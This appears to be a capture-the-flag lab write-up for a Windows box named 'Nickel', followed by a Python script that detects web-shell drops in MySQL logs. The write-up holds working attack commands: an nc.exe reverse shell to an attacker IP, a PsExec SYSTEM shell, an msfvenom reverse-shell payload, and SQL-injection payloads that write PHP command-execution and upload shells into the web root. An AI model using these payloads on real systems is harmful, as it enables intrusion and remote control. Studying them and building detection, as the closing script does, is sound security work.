
Nickel - Port forwarding - 3 escalation methods

Step by step

  1. nmap
  2. try curl
  3. ssh in
  4. enumerate open ports
  5. port 80 is open locally
  6. port forwarding to reach the site
  7. using command

3 escalation methods

Method 1

curl from the ariah shell. Then localhost?command. Upload nc.exe to the user's directory (which is writable). Then curl:

curl http://localhost?cd%20C%3A%5CUsers%5Cariah%3B%20.%5Cnc.exe%20-nv%20192.168.45.250%204444%20-e%20cmd

Method 2

scp ./PsExec64.exe ariah@192.168.179.99:C:/Users/ariah/Downloads/psexec.exe

psexec.exe -accepteula -s cmd.exe

Method 3

ssh -f -N -L 127.0.0.1:8080:127.0.0.1:80 ariah@192.168.179.99

Listen on port 8080 on Kali, forwarded to port 80 on the ariah SSH host.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=139 -f exe > bd.exe

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'

Hint: write a file-upload shell via SQL

' UNION SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>" INTO OUTFILE 'C:/xampp/htdocs/cmd2.php' -- -'
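Both INTO OUTFILE payloads above rely on MySQL being allowed to write PHP into the XAMPP web root. As an added defensive example (not part of the original write-up), the Python below scans constructed MySQL general-log lines and flags statements that write files under C:/xampp/htdocs (the web root location is assumed), combine UNION SELECT with a file write, or carry a PHP body that passes request input to a shell function; a benign CSV export outside the web root is left alone.

```python
import re

# Web root from the write-up: XAMPP serves C:/xampp/htdocs (assumed location).
WEB_ROOTS = ("c:/xampp/htdocs",)
# MySQL file-write clauses; a quoted target path follows them.
FILE_WRITE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']+)'", re.IGNORECASE)
# PHP functions that hand a string to the OS shell, and request superglobals.
SHELL_FUNCS_RE = re.compile(r"\b(passthru|system|shell_exec|exec|popen)\s*\(", re.IGNORECASE)
USER_INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def writes_into_web_root(path: str) -> bool:
    """True if an OUTFILE/DUMPFILE target lies under a web-served directory."""
    normalised = path.replace("\\", "/").lower()
    return any(normalised.startswith(root) for root in WEB_ROOTS)


def analyse_query(sql: str) -> list:
    """Return the reasons a statement looks like a web-shell drop (empty list if none)."""
    match = FILE_WRITE_RE.search(sql)
    if not match:
        return []  # ordinary statements never reach the heuristics below
    reasons = []
    if writes_into_web_root(match.group(2)):
        reasons.append(f"file written into web root: {match.group(2)}")
    if re.search(r"\bUNION\s+SELECT\b", sql, re.IGNORECASE):
        reasons.append("UNION SELECT combined with a file write (injection pattern)")
    if "<?php" in sql.lower() and SHELL_FUNCS_RE.search(sql) and USER_INPUT_RE.search(sql):
        reasons.append("PHP body passes request input to a shell function")
    return reasons


def scan_general_log(lines) -> list:
    """Return [(line_no, reasons)] for suspicious Query entries in MySQL general-log lines."""
    findings = []
    for no, line in enumerate(lines, 1):
        # general_log text format: <time> <thread_id> Query <statement>
        parts = line.split("Query", 1)
        if len(parts) == 2:
            reasons = analyse_query(parts[1].strip())
            if reasons:
                findings.append((no, reasons))
    return findings


# Constructed sample log: one normal query, one web-shell drop, one benign CSV export.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 12 Query SELECT name FROM products WHERE id = 3",
    "2024-01-01T10:00:02Z 12 Query SELECT name FROM products WHERE id = -1 UNION SELECT "
    "\"<?php echo passthru($_GET['cmd']); ?>\" INTO OUTFILE 'C:/xampp/htdocs/cmd.php'",
    "2024-01-01T10:00:03Z 13 Query SELECT * FROM orders INTO OUTFILE 'C:/backups/orders.csv'",
]

if __name__ == "__main__":
    for line_no, reasons in scan_general_log(SAMPLE_LOG):
        print(f"line {line_no}: " + "; ".join(reasons))
```

The same heuristics apply to a `secure_file_priv` review: if the server is allowed to write into the web root at all, the log check is a fallback, not the fix.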